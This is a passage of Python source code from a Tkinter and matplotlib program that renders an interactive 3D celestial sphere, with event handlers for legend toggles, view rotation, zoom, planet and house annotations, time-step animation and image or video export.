self.geo_latitude<0 else \"N\"\r\n s2 = \"W\" if self.geo_longitude<0 else \"E\"\r\n txt=\"ARMC={:.0f}°, lat={:.0f}°{}, lon={:.0f}°{}\".format(ARMC,self.geo_latitude,s1,self.geo_longitude,s2)\r\n self.id_text.set_text(txt)\r\n\r\n name = \" {} {} \".format(self.data[\"n\"], self.data[\"ln\"])\r\n time_loc_ = \" {}, {}\".format(self.data[\"date_loc\"],self.data[\"time_loc\"])\r\n name = \" {} {} \".format(self.data[\"n\"], self.data[\"ln\"])\r\n time_utc_ = \" UTC: {}, {} \".format(self.date_utc, self.time_utc)\r\n self.id_text_name.set_text(name)\r\n self.id_text_time.set_text(time_loc_)\r\n self.id_text_time2.set_text(time_utc_)\r\n\r\n self.legend_updt()\r\n\r\n self.canvas.draw() \r\n\r\n\r\n def Rodrigues_rotation(self, v, k, rotation): #Rodrigues' rotation formula #rotation about k; v= vector to rotate\r\n v_rot = v * np.cos(rotation) + np.cross(k, v) * np.sin(rotation) + k * np.dot(k, v) * (1 - np.cos(rotation))\r\n return v_rot\r\n\r\n def circl_vect(self,k,v,φ2,r=1): \r\n x = r * v[0] * np.sin(φ2) + r * k[0] * np.cos(φ2)\r\n y = r * v[1] * np.sin(φ2) + r * k[1] * np.cos(φ2)\r\n z = r * v[2] * np.sin(φ2) + r * k[2] * np.cos(φ2)\r\n return [x, y, z]\r\n\r\n def line_vect(self, k, v, n=10, col=\"#0D5022\"):\r\n x = np.linspace(k[0],v[0],n)\r\n y = np.linspace(k[1],v[1],n)\r\n z = np.linspace(k[2],v[2],n)\r\n return [x, y, z]\r\n \r\n def legend_updt(self):\r\n for leg in self.leg_obj:\r\n lin=self.leg_obj[leg][1]\r\n if lin==None:continue\r\n if isinstance(lin,tuple):lin=lin[0]\r\n isVisible = lin.get_visible()\r\n leg.set_alpha(1.0 if isVisible else 0.2)\r\n self.canvas.draw_idle()\r\n\r\n def show_annot(self,v3d,txt, interval_=5000):\r\n x2, y2, _ = proj3d.proj_transform(*v3d, self.ax.get_proj())\r\n self.annot.xy = x2, y2\r\n self.annot.set_text(txt)\r\n self.annot.set_visible(True)\r\n try:self.timer.stop()\r\n except:pass\r\n self.timer = self.canvas.new_timer(interval=interval_)\r\n self.timer.add_callback(self.clear_ann)\r\n self.timer.start()\r\n\r\n def toggle_ecliptic_scale(self, hide=False):\r\n isVisible= self.ecliptic_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.ecl_circl_1.get_visible()==False:isVisible=True\r\n for i in self.ecliptic_scale:\r\n self.ecliptic_scale[i][0].set_visible(not isVisible)\r\n self.ecliptic_scale[i][1].set_visible(not isVisible)\r\n\r\n def toggle_equator_scale(self, hide=False):\r\n isVisible= self.equator_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.eq_circl_1.get_visible()==False:isVisible=True\r\n for i in self.equator_scale:\r\n self.equator_scale[i][0].set_visible(not isVisible)\r\n self.equator_scale[i][1].set_visible(not isVisible) \r\n\r\n def toggle_horizon_scale(self, hide=False):\r\n isVisible= self.Hor_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.hor_circl_1.get_visible()==False:isVisible=True\r\n for i in self.Hor_scale:\r\n self.Hor_scale[i][0].set_visible(not isVisible)\r\n self.Hor_scale[i][1].set_visible(not isVisible) \r\n\r\n def toggle_prime_vert_scale(self, hide=False):\r\n isVisible= self.PV_scale[1][1].get_visible()\r\n if hide==True:isVisible=True\r\n if self.prime_vert_1.get_visible()==False:isVisible=True\r\n for i in self.PV_scale:\r\n self.PV_scale[i][0].set_visible(not isVisible)\r\n self.PV_scale[i][1].set_visible(not isVisible) \r\n \r\n\r\n def key_(self,event):\r\n if event.key==\"escape\":\r\n pass\r\n #exit()\r\n\r\n elif event.key==\"left\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n azim_=azim_+1\r\n self.ax.view_init(azim = 
azim_, elev = elev_) \r\n self.canvas.draw_idle()\r\n\r\n elif event.key==\"right\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev \r\n azim_=azim_-1\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n self.canvas.draw_idle()\r\n\r\n elif event.key==\"up\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n elev_+=1\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n self.canvas.draw_idle()\r\n\r\n elif event.key==\"down\":\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n elev_-=1\r\n self.ax.view_init(azim = azim_, elev = elev_)\r\n self.canvas.draw_idle()\r\n\r\n if event.key==\"j\":\r\n self.ax.view_init(azim = 0, elev = 0) \r\n self.canvas.draw_idle()\r\n if event.key==\"h\":\r\n self.canvas.draw_idle()\r\n elif event.key==\"ctrl+s\":\r\n filename=r\"3D_astro\"\r\n filename=asksaveasfilename(parent=self.parent,title=\"Save file\",initialdir=\"C:\\\\\",initialfile = filename,filetypes=[('image, .png', '*.png'),('All Files', '*.*')])\r\n if filename==\"\":return\r\n filename=f\"{filename}.png\"\r\n self.fig.savefig(filename)\r\n\r\n def onpick(self,event):\r\n if event.mouseevent.button in [2,\"up\",\"down\"]:return\r\n legend = event.artist\r\n if legend in self.legend.get_lines():\r\n txt=self.leg_obj[legend]\r\n txt=self.leg_obj[legend][0]\r\n if txt==\"Axes\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.axes_id.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n self.axes_id.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.axes_id.get_visible()\r\n self.axes_id.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n elif txt==\"Sphere\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n for id_ in [self.surface1, self.surface2]:#self.surface\r\n isVisible = id_.get_visible()\r\n id_.set_visible(not isVisible)\r\n return \r\n isVisible = self.sphere_.get_visible()\r\n self.sphere_.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2) \r\n\r\n elif txt==\"Ecliptic\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.ecl_circl_2.get_alpha() != self.alpha_main_2 else False\r\n alfa2= self.alpha_main_2 if dim else 0.3\r\n for cir in [self.ecl_circl_1, self.ecl_circl_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.ecl_circl_1.get_visible()\r\n self.ecl_circl_1.set_visible(not isVisible)\r\n self.ecl_circl_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n for id_ in self.ecl_ids:\r\n id_.set_visible(not isVisible)\r\n for id_ in self.houses_obj:\r\n id_.set_visible(not isVisible)\r\n for id_ in self.zodiac_obj:\r\n id_.set_visible(not isVisible)\r\n\r\n self.toggle_ecliptic_scale(hide= True)\r\n\r\n elif txt==\"Equator\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.eq_circl_2.get_alpha() != self.alpha_main_2 else False\r\n alfa2= self.alpha_main_2 if dim else 0.3\r\n for cir in [self.eq_circl_1, self.eq_circl_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.eq_circl_1.get_visible()\r\n self.eq_circl_1.set_visible(not isVisible)\r\n self.eq_circl_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n for id_ in self.equat_ids:\r\n id_.set_visible(not isVisible)\r\n\r\n self.toggle_equator_scale(hide= True) \r\n\r\n elif txt==\"Horizon\":\r\n 
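# Legend-pick convention shared by the branches here: left-click toggles visibility of the circle (each main circle is a solid front half plus a dashed back half), right-click only dims it by lowering the alpha, and the legend entry is greyed to 0.2 while the circle is hidden.\r\n                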
self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.hor_circl_2.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n for cir in [self.hor_circl_1, self.hor_circl_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.hor_circl_1.get_visible()\r\n self.hor_circl_1.set_visible(not isVisible)\r\n self.hor_circl_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n self.toggle_horizon_scale(hide= True) \r\n\r\n elif txt==\"Prime Vertical\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.prime_vert_2.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n for cir in [self.prime_vert_1, self.prime_vert_2]:\r\n cir.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.prime_vert_1.get_visible()\r\n self.prime_vert_1.set_visible(not isVisible)\r\n self.prime_vert_2.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n self.toggle_prime_vert_scale(hide= True)\r\n\r\n elif txt==\"Meridian\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n dim = True if self.mer_circle.get_alpha() != self.alpha_main else False\r\n alfa2= self.alpha_main if dim else 0.2\r\n self.mer_circle.set_alpha(alfa2)\r\n self.canvas.draw_idle()\r\n return\r\n isVisible = self.mer_circle.get_visible()\r\n self.mer_circle.set_visible(not isVisible)\r\n legend.set_alpha(1.0 if not isVisible else 0.2)\r\n\r\n elif txt==\"Show half\":\r\n self.annot.set_visible(False)\r\n if event.mouseevent.button==3:\r\n self.circles_alpha()\r\n self.canvas.draw_idle()\r\n return\r\n if self.half==0:\r\n self.half=1\r\n for id_ in self.view_West:\r\n id_.set_visible(False)\r\n for id_ in self.view_East:\r\n id_.set_visible(True) \r\n elif self.half==1:\r\n self.half=2\r\n for id_ in self.view_West:\r\n id_.set_visible(True)\r\n for id_ in self.view_East:\r\n id_.set_visible(False)\r\n elif self.half==2:\r\n self.half=0\r\n for id_ in self.view_West:\r\n id_.set_visible(True)\r\n for id_ in self.view_East:\r\n id_.set_visible(True)\r\n\r\n elif txt==\"Extra off\":\r\n for id_t in self.planets_obj:\r\n obj = self.planets_obj[id_t] \r\n for el in [\"id_Mer\", \"id_Mer_nat\", \"id_Par\", \"id_proj_hor\", \"id_proj_hor_nat\"]:\r\n obj[el].set_visible(False)\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n obj[el][0].set_visible(False)\r\n for el in [\"id_l_eq\", \"id_l_ecl\",\"id_l_ho\"]:\r\n obj[el].set_visible(False)\r\n self.annot.set_visible(False)\r\n\r\n self.toggle_ecliptic_scale(hide= True) \r\n self.toggle_equator_scale(hide= True) \r\n self.toggle_horizon_scale(hide= True) \r\n self.toggle_prime_vert_scale(hide= True)\r\n\r\n elif txt==\"Scale\":\r\n if event.mouseevent.button==3:\r\n self.toggle_equator_scale() \r\n else:\r\n self.toggle_ecliptic_scale()\r\n self.toggle_equator_scale()\r\n self.canvas.draw_idle()\r\n return\r\n\r\n if event.artist==self.id_v_start:\r\n if event.mouseevent.button==1:\r\n self.timestamp=self.timestampIni\r\n self.plot_next_prev(minutes=0)\r\n self.extra_off()\r\n self.ax.set_xlim(self.xlim)\r\n self.ax.set_ylim(self.ylim)\r\n self.ax.set_zlim(self.zlim)\r\n self.ax.view_init(azim = self.azim0, elev = self.elev0) \r\n self.mer_circle.set_visible(True)\r\n self.prime_vert_1.set_visible(True)\r\n self.prime_vert_2.set_visible(True) \r\n\r\n elif event.artist==self.id_v_chart:\r\n if 
event.mouseevent.button==3:\r\n azim_= 90 + np.degrees(self.Asc_φ_hor)\r\n elev_=self.pole_ecl_elev+90\r\n if self.south==True:elev_=self.pole_ecl_elev-90\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n else:\r\n azim_=90 + np.degrees(self.Asc_φ_hor)\r\n a1('azim_ 90 + np.degrees(self.Asc_φ_hor)',azim_,\"elev =\", self.pole_ecl_elev); #71,24\r\n self.ax.view_init(azim = azim_, elev = self.pole_ecl_elev) \r\n self.mer_circle.set_visible(False)\r\n self.prime_vert_1.set_visible(False)\r\n self.prime_vert_2.set_visible(False) \r\n if event.mouseevent.button==3:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n self.ax.view_init(azim = 30, elev = elev_)\r\n\r\n \r\n elif event.artist==self.id_v_Eq:\r\n if event.mouseevent.button == 3:\r\n self.ax.view_init(azim = 90, elev = self.poleN_elev-90)\r\n else:\r\n self.ax.view_init(azim = 90, elev = self.poleN_elev)\r\n\r\n elif event.artist==self.id_v_anim:\r\n s=0; m=0; h=0\r\n val=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if val==\"sec\":\r\n s=Δt\r\n elif val==\"min\":\r\n m=Δt\r\n elif val==\"hour\":\r\n h=Δt\r\n \r\n if event.mouseevent.button==3:\r\n s=-s ; m=-m ; h=-h\r\n for i in range(10):\r\n self.parent.after(i*500, lambda s=s, m=m, h=h: self.plot_next_prev(seconds=s, minutes=m, hours=h))\r\n self.canvas.draw_idle() \r\n\r\n elif event.artist==self.id_v_prev:\r\n s=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if s==\"sec\":\r\n self.plot_next_prev(seconds=-Δt)\r\n elif s==\"min\":\r\n self.plot_next_prev(minutes=-Δt) \r\n elif s==\"hour\":\r\n self.plot_next_prev(hours=-Δt)\r\n\r\n val=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if val==\"sec\":\r\n s=Δt\r\n elif val==\"min\":\r\n m=Δt\r\n elif val==\"hour\":\r\n h=Δt\r\n\r\n elif event.artist==self.id_v_next:\r\n s=self.radio.value_selected\r\n Δt=int(self.text_box.text)\r\n if s==\"sec\":\r\n self.plot_next_prev(seconds=Δt)\r\n elif s==\"min\":\r\n\r\n self.plot_next_prev(minutes=Δt) \r\n elif s==\"hour\":\r\n self.plot_next_prev(hours=Δt)\r\n\r\n elif event.artist==self.id_E:\r\n self.ax.view_init(azim = 30,elev = 15) \r\n\r\n elif event.artist==self.id_W:\r\n self.ax.view_init(azim = 200, elev = 15)\r\n\r\n elif event.artist==self.id_N:\r\n self.ax.view_init(azim = 180, elev = -90) \r\n \r\n elif event.artist==self.id_S:\r\n self.ax.view_init(azim = 180, elev = 90) \r\n\r\n elif event.artist==self.id_A0:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = 0, elev = elev_) \r\n else:\r\n self.ax.view_init(azim = 0, elev = elev_) \r\n\r\n elif event.artist==self.id_E0:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = azim_, elev = 0) \r\n else:\r\n self.ax.view_init(azim = azim_, elev = 0) \r\n\r\n elif event.artist==self.id_A90:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = -90, elev = elev_) \r\n else:\r\n self.ax.view_init(azim = 90, elev = elev_) \r\n\r\n elif event.artist==self.id_A180:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = 180, elev = elev_) \r\n else:\r\n azim_=azim_+10\r\n self.ax.view_init(azim = 180, elev = elev_) \r\n\r\n elif event.artist==self.id_E90:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = azim_, elev = -90) \r\n else:\r\n self.ax.view_init(azim = azim_, elev = 90) \r\n\r\n elif 
event.artist==self.id_E180:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n self.ax.view_init(azim = azim_, elev = 180) \r\n else:\r\n self.ax.view_init(azim = azim_, elev = 180) \r\n\r\n elif event.artist==self.id_v_left:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n azim_-=1\r\n else:\r\n azim_-=10\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n\r\n elif event.artist==self.id_v_right:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n azim_+=1\r\n else: \r\n azim_+=10\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n\r\n elif event.artist==self.id_v_up:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n elev_+=1\r\n else: \r\n elev_=elev_+10\r\n self.ax.view_init(azim = azim_, elev = elev_) \r\n\r\n elif event.artist==self.id_v_down:\r\n azim_, elev_ = self.ax.azim, self.ax.elev\r\n if event.mouseevent.button==3:\r\n elev_-=1\r\n else: \r\n elev_=elev_-10\r\n self.ax.view_init(azim = azim_, elev = elev_)\r\n\r\n elif event.artist==self.id_v_test:\r\n pass\r\n\r\n elif event.artist==self.id_help_ico:\r\n self.helpDialog = helpWindow_3D(self.parent,title=\"Help\")\r\n\r\n if event.artist in [self.id_v_start, self.id_v_up, self.id_v_down, self.id_v_left, self.id_v_right, self.id_E, self.id_W, self.id_N, self.id_S, self.id_E0, self.id_A0, self.id_E90, self.id_E180, self.id_A90, self.id_A180,self.id_v_Eq, self.id_v_chart, self.id_v_test,self.id_view, self.id_azim, self.id_elev]:\r\n azim, elev = self.ax.azim, self.ax.elev\r\n txt=\" azim={:.1f}°, elev={:.1f}° \".format(azim, elev)\r\n self.id_text_2.set_text(txt)\r\n self.canvas.draw_idle()\r\n self.timer_azim_elev(15000) \r\n return\r\n\r\n if event.artist in [self.eq_circl_1, self.eq_circl_2] and self.eq_circl_1.get_visible():\r\n el=event.artist\r\n el=event.artist\r\n ind = event.ind\r\n xx, yy, zz = el.get_data_3d()\r\n i=ind[0]\r\n x,y,z=[xx[i],yy[i],zz[i]]\r\n φ2=np.arccos(x);\r\n φ2a=np.degrees(φ2)\r\n if y>=0:\r\n φ2 = φ2 + np.pi/2\r\n elif y<0:\r\n φ2 = np.pi/2 - φ2\r\n if φ2<0: φ2 = φ2 + 2*np.pi \r\n if self.south==True: φ2=np.pi-φ2\r\n φ2=norm_r(φ2) \r\n φ2a=np.degrees(φ2)\r\n RA= norm_(φ2a + self.ARMC)\r\n self.show_txt_tip(RA,\"Equator\")\r\n\r\n elif event.artist in [self.ecl_circl_1, self.ecl_circl_2] and self.ecl_circl_1.get_visible():\r\n el=event.artist\r\n ind = event.ind\r\n xx, yy, zz = el.get_data_3d()\r\n i=ind[0]\r\n x,y,z=[xx[i],yy[i],zz[i]]\r\n d=np.dot(self.v_equinox,[x,y,z]);\r\n φ2=np.arccos(d)\r\n lon=np.degrees(φ2)\r\n \r\n if self.south==True: φ2=np.pi-φ2\r\n φ2=norm_r(φ2) \r\n φ2a=np.degrees(φ2)\r\n v=np.cross(self.v_equinox,[x,y,z])\r\n\r\n if self.v_MC[1]<=0 and v[2]<0:\r\n lon=norm_(360-lon)\r\n if self.v_MC[1]>0 and v[2]>0:\r\n lon=norm_(360-lon)\r\n\r\n self.show_txt_tip(lon,\"Ecliptic\")\r\n\r\n\r\n if event.mouseevent.button==3:\r\n for id_t in self.planets_obj.keys(): # click circles to hide\r\n obj = self.planets_obj[id_t]\r\n for key_ in [\"id_Mer\", \"id_Par\", \"id_proj_hor\", \"id_Mer_nat\", \"id_proj_hor_nat\"]:\r\n id_=obj[key_]\r\n if event.artist==id_:\r\n id_.set_visible(False)\r\n return\r\n\r\n\r\n for id_t in self.planets_obj.keys(): # click planet text\r\n obj = self.planets_obj[id_t]\r\n if event.artist==id_t:\r\n if event.mouseevent.button==3:\r\n pass\r\n '''\r\n isVisible = obj[\"id_Mer_nat\"].get_visible()\r\n obj[\"id_Mer_nat\"].set_visible(not isVisible)\r\n obj[\"id_proj_hor_nat\"].set_visible(not isVisible)\r\n '''\r\n 
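# Right-click on a planet label is currently a no-op (the natal meridian/horizon toggle above is parked inside the triple-quoted block); both buttons fall through to the azimuth/altitude summary written to the status bar below.\r\n                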
else:\r\n pass\r\n \r\n φ_hor = obj[\"id_pt_Hor\"][1]\r\n azimuth = obj[\"id_pt_Hor\"][3]\r\n altitude = obj[\"id_pt_Hor\"][4]\r\n txt=\" {}, azim={:.1f}°(E), {:.1f}°(N), alt={:.1f}°\".format(obj[\"txt\"], φ_hor, azimuth, altitude)\r\n txt=txt.replace(\"Node_\",\"Node \")\r\n self.id_text_2.set_text(txt)\r\n self.timer_azim_elev(15000) \r\n self.canvas.draw_idle()\r\n return\r\n\r\n for id_t in self.planets_obj.keys(): # click planet dot\r\n obj = self.planets_obj[id_t]\r\n id_pl = obj[\"id_pl\"]\r\n if event.artist==id_pl:\r\n if id_pl.get_visible()==False:return\r\n if event.mouseevent.button==1:\r\n if self.planets_obj[id_t][\"show_mer_par\"]==0:\r\n obj[\"id_Mer\"].set_visible(True)\r\n obj[\"id_Par\"].set_visible(True)\r\n #obj[\"id_proj_hor\"].set_visible(True) #planet's proportionate horizon\r\n self.planets_obj[id_t][\"show_mer_par\"]=1\r\n elif self.planets_obj[id_t][\"show_mer_par\"]==1:\r\n obj[\"id_Mer\"].set_visible(True)\r\n obj[\"id_Par\"].set_visible(False)\r\n #obj[\"id_proj_hor\"].set_visible(False)\r\n self.planets_obj[id_t][\"show_mer_par\"]=2\r\n elif self.planets_obj[id_t][\"show_mer_par\"]==2:\r\n obj[\"id_Mer\"].set_visible(False)\r\n obj[\"id_Par\"].set_visible(True)\r\n #obj[\"id_proj_hor\"].set_visible(False)\r\n self.planets_obj[id_t][\"show_mer_par\"]=3\r\n elif self.planets_obj[id_t][\"show_mer_par\"]==3:\r\n obj[\"id_Mer\"].set_visible(False)\r\n obj[\"id_Par\"].set_visible(False)\r\n #obj[\"id_proj_hor\"].set_visible(False)\r\n self.planets_obj[id_t][\"show_mer_par\"]=0\r\n\r\n elif event.mouseevent.button==3:\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n isVisible = obj[el][0].get_visible()\r\n obj[el][0].set_visible(not isVisible)\r\n for el in [\"id_l_eq\", \"id_l_ecl\", \"id_l_ho\"]:\r\n isVisible = obj[el].get_visible()\r\n obj[el].set_visible(not isVisible)\r\n\r\n φ_hor = obj[\"id_pt_Hor\"][1]\r\n azimuth = obj[\"id_pt_Hor\"][3]\r\n altitude = obj[\"id_pt_Hor\"][4]\r\n txt=\" {}, azim={:.1f}°(E), {:.1f}°(N), alt={:.1f}°\".format(obj[\"txt\"], φ_hor, azimuth, altitude)\r\n txt=txt.replace(\"Node_\",\"Node \")\r\n self.id_text_2.set_text(txt)\r\n self.timer_azim_elev(15000) \r\n return\r\n\r\n for id_t in self.planets_obj.keys(): # click projection dot\r\n obj = self.planets_obj[id_t]\r\n id_pl = obj[\"id_pl\"]\r\n id_dot_Eq = obj[\"id_pt_Eq\"][0]\r\n id_dot_Ec = obj[\"id_pt_Ecl\"][0]\r\n id_dot_H = obj[\"id_pt_Hor\"][0]\r\n name = obj[\"name\"]\r\n\r\n if event.artist in [id_dot_Eq, id_dot_Ec ,id_dot_H]:\r\n if event.mouseevent.button == 3:\r\n self.clear_ann(event)\r\n else:\r\n if event.artist ==id_dot_Eq:\r\n if id_dot_Eq.get_visible()==False:return\r\n txt=\" {} RA={:.0f}°\".format(name, obj[\"id_pt_Eq\"][1])\r\n xyz=obj[\"id_pt_Eq\"][2]\r\n elif event.artist ==id_dot_H:\r\n if id_dot_H.get_visible()==False:return\r\n txt=\" {} azim={:.0f}°(from E) \".format(name,obj[\"id_pt_Hor\"][1])# φ hor.\r\n xyz=obj[\"id_pt_Hor\"][2] \r\n elif event.artist ==id_dot_Ec:\r\n if id_dot_Ec.get_visible()==False:return \r\n txt=\" {} ecl. 
long={:.0f}° \".format(name, obj[\"id_pt_Ecl\"][1])\r\n xyz=obj[\"id_pt_Ecl\"][2] \r\n self.show_annot(xyz,txt, interval_=2000)\r\n self.canvas.draw_idle()\r\n return\r\n\r\n for id_ in self.houses_obj.keys():\r\n if event.artist==id_:\r\n obj = self.houses_obj[id_]\r\n txt=\" {}, {} \".format(obj[0], obj[1])\r\n self.show_annot(obj[2],txt)\r\n\r\n if event.mouseevent.button == 3:\r\n self.clear_ann(event)\r\n else:\r\n self.canvas.draw_idle()\r\n return\r\n\r\n for id_ in self.zodiac_obj.keys(): \r\n if event.artist==id_:\r\n obj = self.zodiac_obj[id_]\r\n txt=\" {}, {} \".format(obj[0], obj[1])\r\n self.show_annot(obj[2],txt)\r\n x2, y2, _ = proj3d.proj_transform(*obj[2], self.ax.get_proj())\r\n if event.mouseevent.button == 3:\r\n self.clear_ann(event)\r\n else:\r\n self.canvas.draw_idle()\r\n return\r\n\r\n\r\n if id(event.artist) in self.ids.keys():\r\n xyz=self.ids[id(event.artist)][0]\r\n txt=self.ids[id(event.artist)][1]\r\n for i in range(len(self.click_tip_list)):\r\n if self.click_tip_list[i] in txt:\r\n s=True\r\n x2, y2, _ = proj3d.proj_transform(xyz[0],xyz[1],xyz[2], self.ax.get_proj())\r\n self.annot.xy = x2, y2\r\n self.annot.set_text(txt)\r\n self.annot.set_visible(True)\r\n\r\n try:self.timer.stop()\r\n except:pass\r\n self.timer = self.canvas.new_timer(interval=5000)\r\n self.timer.add_callback(self.clear_ann)\r\n self.timer.start()\r\n self.canvas.draw_idle()\r\n\r\n def on_click(self,event):\r\n if event.button==3:\r\n self.clear_ann()\r\n\r\n def show_txt_tip(self,dig,which=\"\"):\r\n if which==\"Ecliptic\":\r\n txt = \" Click on Ecliptic: lon={:.0f}° \".format(dig)\r\n elif which==\"Equator\":\r\n txt = \" Click on Equator: RA={:.0f}° \".format(dig)\r\n else:\r\n txt = \" {} \".format(dig)\r\n self.id_text_3.set_text(txt)\r\n self.canvas.draw_idle()\r\n try:self.timer3.stop()\r\n except:pass\r\n self.timer3 = self.canvas.new_timer(interval=15000)\r\n self.timer3.add_callback(self.hide_txt_tip)\r\n self.timer3.start()\r\n\r\n def hide_txt_tip(self):\r\n self.id_text_3.set_text(\"\")\r\n self.canvas.draw_idle()\r\n try:self.timer3.stop()\r\n except:pass\r\n\r\n def zoom_(self, event, r):\r\n l_x1, l_x2 = self.ax.get_xlim()\r\n l_y1, l_y2 = self.ax.get_ylim()\r\n xdata = event.xdata\r\n ydata = event.ydata\r\n width = l_x2 - l_x1\r\n height = l_y2 - l_y1\r\n w = r*width ; h = r*height\r\n dx1 = xdata - (xdata - l_x1) * r\r\n dx2 = xdata + (l_x2 - xdata) * r\r\n dy1 = ydata - (ydata - l_y1) * r\r\n dy2 = ydata + (l_y2 - ydata) * r\r\n self.ax.set_xlim(dx1, dx2)\r\n self.ax.set_ylim(dy1, dy2)\r\n self.ax.figure.canvas.draw()\r\n\r\n def scroll_zoom(self, event):\r\n r=0.20\r\n r=1-r\r\n if event.button == \"up\":\r\n self.zoom_(event,r) \r\n elif event.button == \"down\":\r\n self.zoom_(event,1/r)\r\n\r\n\r\n def extra_off(self):\r\n for id_t in self.planets_obj:\r\n obj = self.planets_obj[id_t] \r\n for el in [\"id_Mer\", \"id_Mer_nat\", \"id_Par\", \"id_proj_hor\", \"id_proj_hor_nat\"]:\r\n obj[el].set_visible(False)\r\n for el in [\"id_pt_Eq\", \"id_pt_Hor\", \"id_pt_Ecl\"]:\r\n obj[el][0].set_visible(False)\r\n for el in [\"id_l_eq\", \"id_l_ecl\",\"id_l_ho\"]:\r\n obj[el].set_visible(False)\r\n self.annot.set_visible(False)\r\n #self.hide_h_line()\r\n\r\n #for el in [\"id_asc_Eq\", \"id_Mer\", \"id_l_eq\",\"id_Mer_nat\"]: \r\n # self.ASC_inf[el].set_visible(False)\r\n\r\n self.toggle_ecliptic_scale(hide= True) \r\n self.toggle_equator_scale(hide= True) \r\n self.toggle_horizon_scale(hide= True) \r\n self.toggle_prime_vert_scale(hide= True)\r\n\r\n def 
timer_azim_elev(self, interval=15000, event=None):\r\n try:self.timer_az.stop()\r\n except:pass\r\n self.timer_az = self.canvas.new_timer(interval=interval)\r\n self.timer_az.add_callback(self.clear_azim_elev)\r\n self.timer_az.start()\r\n\r\n def clear_azim_elev(self, event=None):\r\n try:self.timer_az.stop()\r\n except:pass\r\n self.id_text_2.set_text(\"\")\r\n self.canvas.draw_idle()\r\n print(\"clear azim_elev\") \r\n \r\n def clear_ann(self, event=None):\r\n self.annot.set_text(\"\")\r\n self.annot.set_visible(False)\r\n self.canvas.draw_idle()\r\n try:self.timer.stop()\r\n except:pass\r\n\r\n def save_animation(self, frames=40, minutes=0, hours=0, format=\"gif\"):\r\n def animate(frame_n):\r\n self.plot_next_prev(minutes=minutes, hours=hours)\r\n return \r\n\r\n resp = messagebox.askquestion(\"Sample animation\", f\"Save sample animation?\\nframes={frames}\\nminutes={minutes}, hours={hours}\") \r\n if resp != \"yes\":\r\n return\r\n anim = animation.FuncAnimation(self.fig, animate, frames=frames, interval=200, repeat=False, blit=False)\r\n video_ = animation.FFMpegWriter(fps=3)\r\n if format==\"gif\":\r\n filename=\"Astronomia3D_animation\"\r\n filename=asksaveasfilename(parent=self.parent,title=\"Save file\",initialdir=\"C:\\\\\",initialfile = filename,filetypes=[('image, .gif', '*.gif'),('All Files', '*.*')])\r\n if filename==\"\":return\r\n filename=f\"{filename}.gif\"\r\n elif format==\"mp4\":\r\n filename=\"Astronomia3D_animation\"\r\n filename=asksaveasfilename(parent=self.parent,title=\"Save file\",initialdir=\"C:\\\\\",initialfile = filename,filetypes=[('video, .mp4', '*.mp4'),('All Files', '*.*')])\r\n if filename==\"\":return\r\n 